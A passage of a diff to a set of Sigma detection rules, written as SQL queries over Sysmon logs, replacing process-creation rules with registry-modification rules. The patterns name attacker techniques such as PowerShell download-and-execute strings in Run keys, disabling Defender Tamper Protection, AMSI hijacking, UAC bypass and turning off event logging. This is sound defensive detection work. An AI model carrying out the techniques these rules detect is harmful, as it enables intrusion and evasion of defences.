extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR Details LIKE 'CutePDF Writer' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND Details = 'VNCpm.dll')))" ], - "filename": "proc_creation_win_hxtsr_masquerading.yml" + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", - "id": "435e10e4-992a-4281-96f3-38b11106adde", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Renamed FTP.EXE Execution", - "id": "277a4393-446c-449a-b0ed-7fdc7795244c", - "status": "test", - "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", - "author": "Victor Sergeev, oscd.community", + "title": "Disable Exploit Guard Network Protection on Windows Defender", + "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "status": "experimental", + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.t1059", "attack.defense_evasion", - "attack.t1202" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'ftp.exe' AND NOT (Image LIKE '%\\\\ftp.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND Details = 'DWORD (00000001)')" ], - "filename": "proc_creation_win_renamed_ftp.yml" + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" }, { - "title": "Firewall Rule Deleted Via Netsh.EXE", - "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "title": "Disable Tamper Protection on Windows Defender", + "id": "93d298a1-d28f-47f1-a468-d971e7796679", "status": "experimental", - "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", - "author": "frack113", + "description": "Detects disabling Windows Defender Tamper Protection", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" }, { - "title": "WSF/JSE/JS/VBA/VBE File Execution", - "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "title": "Suspicious Service Installed", + "id": "f2485272-a156-4773-82d7-1d178bc4905b", "status": "test", - "description": "Detects suspicious file execution by wscript and cscript", - "author": "Michael Haag", + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\') AND Details LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_script_execution.yml" + "filename": "registry_set_susp_service_installed.yml" }, { - "title": "Suspicious Sigverif Execution", - "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", "status": "experimental", - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sigverif.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_sigverif.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Potential PowerShell Downgrade Attack", - "id": "b3512211-c67e-4707-bedc-66efc7848863", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", "status": "test", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Harish Segar (rule)", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_downgrade_attack.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", + "status": "experimental", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((Image = '') OR (Image = '')))" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", - "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Suspicious Powershell In Registry Run Keys", + "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "status": "experimental", + "description": "Detects potential PowerShell commands or code within registry run keys", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Legitimate admin or third party scripts. Baseline according to your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh %' ESCAPE '\\' OR Details LIKE '%FromBase64String%' ESCAPE '\\' OR Details LIKE '%.DownloadFile(%' ESCAPE '\\' OR Details LIKE '%.DownloadString(%' ESCAPE '\\' OR Details LIKE '% -w hidden %' ESCAPE '\\' OR Details LIKE '% -w 1 %' ESCAPE '\\' OR Details LIKE '%-windowstyle hidden%' ESCAPE '\\' OR Details LIKE '%-window hidden%' ESCAPE '\\' OR Details LIKE '% -nop %' ESCAPE '\\' OR Details LIKE '% -encodedcommand %' ESCAPE '\\' OR Details LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR Details LIKE '%Invoke-Expression%' ESCAPE '\\' OR Details LIKE '%IEX (%' ESCAPE '\\' OR Details LIKE '%Invoke-Command%' ESCAPE '\\' OR Details LIKE '%ICM -%' ESCAPE '\\' OR Details LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR Details LIKE '%IWR %' ESCAPE '\\' OR Details LIKE '% -noni %' ESCAPE '\\' OR Details LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_powershell_in_run_keys.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "New Root or CA or AuthRoot Certificate to Store", + "id": "d223b46b-5621-4037-88fe-fda32eead684", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_install_root_or_ca_certificat.yml" }, { - "title": "Suspicious New Instance Of An Office COM Object", - "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", + "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", "status": "experimental", - "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of office automation via scripting" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_office_svchost_parent.yml" + "filename": "registry_set_enabling_turnoffcheck.yml" }, { - "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", - "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "title": "Disable Privacy Settings Experience in Registry", + "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", "status": "experimental", - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "@gott_cyber", + "description": "Detects registry modifications that disable Privacy Settings Experience", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" + "filename": "registry_set_disable_privacy_settings_experience.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Register New IFiltre For Persistence", + "id": "b23818c7-e575-4d13-8012-332075ec0a2b", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], + "falsepositives": [ + "Legitimate registration of IFilters by the OS or software" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE 